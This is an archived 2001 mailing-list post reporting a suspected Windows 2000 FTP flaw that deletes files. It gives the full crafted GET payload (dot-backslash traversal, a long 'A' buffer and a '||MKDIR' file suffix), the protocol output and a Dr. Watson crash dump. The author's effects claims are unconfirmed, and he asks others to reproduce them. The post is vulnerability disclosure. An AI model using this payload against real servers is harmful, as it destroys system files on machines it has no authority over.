Vulnerability Development mailing list archives
WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system.
From: Antti Hakulinen <thpo () DREAMTHEATER ZZN COM>
Date: Fri, 16 Feb 2001 00:53:46 +0200
This little " ms feature" allows anyfile on your system to be deleted. This applies at least Win2k build 2195
servicepack 1 & latest updates.
Using the GET command like this.
_________________________________________________________________________________________________________
C:\FTP <target machine>
blaah blaah....
(BTW: This "feature" Works fine as anonymous user)
_________________________________________________________________________________________________________
ftp> get \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA||MKDIR c:
\downloads\mp3\1.mp3
---> PORT 212,246,182,42,5,52
200 PORT command successful.
---> RETR \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA||MKDIR
500 Command was too long
____________________________________________________________________________________________________________
So, any file what you named in ||MKDIR part is deleted. Well atleast it is gone ;)
Malicious users can now delete files, assuming he/she knows where it is being located.
It will be hell easy to put an end to any machine/server that is using ms ftp.
Just by deleting all the vital system files. If the file doesn't exist, 1 will be created, but length is always 0.
(So no luck with writing a file yet heh)
OHH! Don't get fooled when you do this umm... for example to your config.sys file.
There will be an error message: PERMISSION DENIED : but who cares, this fabulous ms feature deletes it anyway. -huh-
Here is the DRWTSN32.LOG file from my system.
-NOTE- The "get" command line was little different in letters when i tested this "feature" :) , but it was equal in
lenght.
Application exception occurred:
App: ftp.exe (pid=824)
When: 2/16/2001 @ 00:04:23.868
Exception number: c0000005 (access violation)
*----> System Information <----*
Computer Name: DIVINE
User Name: Administrator
Number of Processors: 1
Processor Type: x86 Family 6 Model 3 Stepping 0
Windows 2000 Version: 5.0
Current Build: 2195
Service Pack: None
Current Type: Uniprocessor Free
Registered Organization: xxxxxxxxxxxxxxxx
Registered Owner: xxxxxxxxxxxxxxxx
*----> Task List <----*
0 Idle.exe
8 System.exe
140 smss.exe
164 csrss.exe
160 winlogon.exe
212 services.exe
224 lsass.exe
384 svchost.exe
412 SPOOLSV.exe
444 svchost.exe
484 regsvc.exe
500 mstask.exe
556 tcpsvcs.exe
568 snmp.exe
616 winmgmt.exe
648 inetinfo.exe
1080 explorer.exe
1212 internat.exe
628 msimn.exe
828 SETI () home exe
892 cmd.exe
1280 mdm.exe
824 ftp.exe
1240 drwtsn32.exe
0 _Total.exe
(01000000 - 0100F000)
(77F80000 - 77FF9000)
(75050000 - 75058000)
(77E80000 - 77F36000)
(75030000 - 75044000)
(78000000 - 78046000)
(77DB0000 - 77E0A000)
(77D40000 - 77DAF000)
(75020000 - 75028000)
(74FF0000 - 75002000)
(77E10000 - 77E75000)
(77F40000 - 77F7C000)
(77980000 - 779A4000)
(77840000 - 7784C000)
(777E0000 - 777E8000)
(77950000 - 77979000)
(777F0000 - 777F5000)
(77830000 - 7783E000)
(74FD0000 - 74FE1000)
(75010000 - 75017000)
State Dump for Thread Id 0x324
eax=0006ffb0 ebx=00000000 ecx=00000000 edx=010077c0 esi=00737973 edi=00000001
eip=780121b2 esp=0006f758 ebp=0006f780 iopl=0 nv up ei ng nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000286
function: fclose
78012192 686af50078 push 0x7800f56a
78012197 64a100000000 mov eax,fs:[00000000] fs:00000000=????????
7801219d 50 push eax
7801219e 64892500000000 mov fs:[00000000],esp fs:00000000=????????
780121a5 83ec0c sub esp,0xc
780121a8 53 push ebx
780121a9 56 push esi
780121aa 57 push edi
780121ab 834de4ff or dword ptr [ebp+0xe4],0xff ss:00b3cd56=????????
780121af 8b7508 mov esi,[ebp+0x8] ss:00b3cd56=????????
FAULT ->780121b2 f6460c40 test byte ptr [esi+0xc],0x40 ds:01204f49=??
780121b6 7416 jz wexecve+0x14f (7801a4ce)
780121b8 83660c00 and dword ptr [esi+0xc],0x0 ds:01204f49=????????
780121bc 8b45e4 mov eax,[ebp+0xe4] ss:00b3cd56=????????
780121bf 8b4df0 mov ecx,[ebp+0xf0] ss:00b3cd56=????????
780121c2 64890d00000000 mov fs:[00000000],ecx fs:00000000=????????
780121c9 5f pop edi
780121ca 5e pop esi
780121cb 5b pop ebx
780121cc c9 leave
780121cd c3 ret
780121ce 56 push esi
*----> Stack Back Trace <----*
FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
0006F780 01001E67 00737973 00000000 010018D3 77E9B3C1 !fclose
0006FF70 010054EF 00000001 00283724 00282980 77E9B3C1 ftp!<nosymbols>
0006FFC0 77E87903 77E9B3C1 0012F88F 7FFDF000 C0000005 ftp!<nosymbols>
0006FFF0 00000000 010053F0 00000000 000000C8 00000100 kernel32!SetUnhandledExceptionFilter
*----> Raw Stack Dump <----*
0006f758 01 00 00 00 00 00 00 00 - 00 00 00 00 ff ff ff ff ................
0006f768 c0 77 00 01 a4 f3 06 00 - b0 ff 06 00 6a f5 00 78 .w..........j..x
0006f778 d0 4a 03 78 ff ff ff ff - 70 ff 06 00 67 1e 00 01 .J.x....p...g...
0006f788 73 79 73 00 00 00 00 00 - d3 18 00 01 c1 b3 e9 77 sys............w
0006f798 8f f8 12 00 00 f0 fd 7f - 43 3a 5c 00 ff ff ff ff ........C:\.....
0006f7a8 20 f8 06 00 8f 85 f8 77 - 00 00 00 01 85 71 e8 77 ......w.....q.w
0006f7b8 a1 71 e8 77 bd 5b f9 77 - a0 f8 06 00 00 00 00 00 .q.w.[.w........
0006f7c8 00 e0 fd 7f 00 f8 06 00 - 06 00 00 00 e4 f7 06 00 ................
0006f7d8 00 00 00 00 6e b5 f8 77 - 27 38 f9 77 00 00 04 00 ....n..w'8.w....
0006f7e8 d0 00 00 01 37 00 00 00 - 00 00 00 00 45 f0 fd 7f ....7.......E...
0006f7f8 00 00 00 00 00 f0 fd 7f - 00 02 00 00 20 00 00 00 ............ ...
0006f808 06 00 00 00 06 00 00 00 - cc f8 06 00 fd 13 ea 77 ...............w
0006f818 c0 71 e8 77 ff ff ff ff - 70 f8 06 00 8c 7c e8 77 .q.w....p....|.w
0006f828 00 00 00 00 5c f8 06 00 - 00 00 00 00 98 98 f8 77 ....\..........w
0006f838 00 00 07 00 30 2f 07 00 - 00 00 00 00 38 f8 06 00 ....0/......8...
0006f848 88 06 07 00 ec f8 06 00 - db 80 fb 77 d0 98 f8 77 ...........w...w
0006f858 ff ff ff ff fc f8 06 00 - ec 9c fc 77 a8 07 07 00 ...........w....
0006f868 38 2f 07 00 2c 12 ff 74 - c8 2c 07 00 00 00 00 00 8/..,..t.,......
0006f878 01 00 00 00 2c 12 ff 74 - f0 f8 06 00 00 00 00 00 ....,..t........
0006f888 9c f8 06 00 3a 6a f8 77 - 00 00 00 00 70 f9 99 77 ....:j.w....p..w
State Dump for Thread Id 0x4a8
eax=778321fe ebx=00000003 ecx=7ffde000 edx=00000000 esi=77f87e6c edi=00000003
eip=77f87e77 esp=0072fd24 ebp=0072fd70 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
function: ZwWaitForMultipleObjects
77f87e6c b8e9000000 mov eax,0xe9
77f87e71 8d542404 lea edx,[esp+0x4] ss:011fd2fb=????????
77f87e75 cd2e int 2e
77f87e77 c21400 ret 0x14
77f87e7a 668b08 mov cx,[eax] ds:778321fe=8b55
77f87e7d 40 inc eax
77f87e7e 40 inc eax
77f87e7f 8945a4 mov [ebp+0xa4],eax ss:011fd346=????????
77f87e82 6685c9 test cx,cx
77f87e85 75f3 jnz RtlExpandEnvironmentStrings_U+0x26 (77f8e57a)
77f87e87 663930 cmp [eax],si ds:778321fe=8b55
77f87e8a 75ee jnz ZwFsControlFile+0x54 (77f8bf7a)
77f87e8c 40 inc eax
77f87e8d 40 inc eax
77f87e8e 8945a4 mov [ebp+0xa4],eax ss:011fd346=????????
*----> Stack Back Trace <----*
FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
0072FD70 77E9E68A 0072FD48 00000001 00000000 00000000 ntdll!ZwWaitForMultipleObjects
0072FFB4 77E92CA8 00000004 0007BCDC 7FFDE000 0007C6E8 kernel32!WaitForMultipleObjects
0072FFEC 00000000 00000000 00000000 00000000 00000000 kernel32!CreateFileA
___________________________________________________________________________________________________________
Workarounds:
Too tired to search 1 right now.
Noticed that RETR???
Whats that anyway, so maybe disabling commands.
Otherwise, better not to be using w2k as FTP server.
P.S: If you can reproduce this, please let me know.
... if you can't let me know also. :)
I'll end my days if this was known bug, and i haven't just updated my system (which is 2-3 days ago) :)
Anyway, if this is known bug. Let me know please.
Regards: Antti Hakulinen
_____________________________________________________________________________________________________________
Antti Hakulinen Antti.Hakulinen () fi flextronics com
IT Assistant Flextronics Design Finland
Current thread:
- WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. Antti Hakulinen (Feb 15)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. Stephen (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to bedeleted from the remote system. Kevin van der Raad (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. 3APA3A (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. Antti Hakulinen (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted Robert A. Seace (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. Stephen (Feb 16)